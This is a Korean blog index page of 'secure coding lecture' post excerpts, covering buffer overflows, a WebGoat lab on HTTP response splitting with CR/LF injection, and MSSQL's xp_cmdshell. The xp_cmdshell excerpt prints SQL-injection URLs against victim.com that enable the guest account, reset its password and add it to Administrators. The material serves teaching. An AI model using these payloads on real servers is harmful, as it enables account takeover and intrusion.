시큐어코딩 강의 썸네일형 리스트형 시큐어코딩 강의 - Human Bufferoverflow 더보기 시큐어코딩 강의 - Java 1.4.2 API http://www.oracle.com/technetwork/java/javasebusiness/downloads/java-archive-downloads-142docs-2045554.html 더보기 시큐어코딩 강의 - WebGoat 실습 다운로드 : https://code.google.com/p/webgoat/downloads/list주소창 입력 : http://localhost/WebGoat/attackID/PWD : guest/guesthttp://parkya.tistory.com/975 설치 및 실행 HTTP 응답분할 1단계는 http분할 공격이며 이를 토대로 하여 2단계는 http분할 공격을 이용한 캐시중독 공격을 배우게 될것입니다. 검색하려는 시스템 언어를 입력하세요. 그러면 응용 프로그램이 서버에 처리를 요청을 처리하기 위해 서버는 자원을 할당하게된다.당신은 CR(%0d) 와 LF(%0a) 이를 악용하여 문자공격을 사용할수있어야합니다. 당신의 목표는 서버로 부터 강제로 200 ok 신호를 받는 것입니다.만약에 공격 영향으로 스.. 더보기 시큐어코딩 강의 - MSSQL SERVER의 가장 큰 취약점 xp_cmdshell 게으른 데이터베이스 운영자에 의해 MSSQL 서버를 sa계정으로 운영하여 SQL-Injection 취약점으로 인해 웹서버가 접속되도록 만들어주는 xp_cmdshell http://victim.com/research_name=';EXEC xp_cmdshell 'net user guest /active:yes'-- // guest 활성화 http://victim.com/research_name=';EXEC xp_cmdshell 'net user guest test'-- // guest 계정 password 변경(test) http://victim.com/research_name=';EXEC xp_cmdshell 'net localgroup Administrators guest /add'-- // 관리자그룹에.. 더보기 시큐어코딩 강의 - 안전한 C 프로그램을 위한 코딩 표준 더보기 이전 1 2 3 4 다음
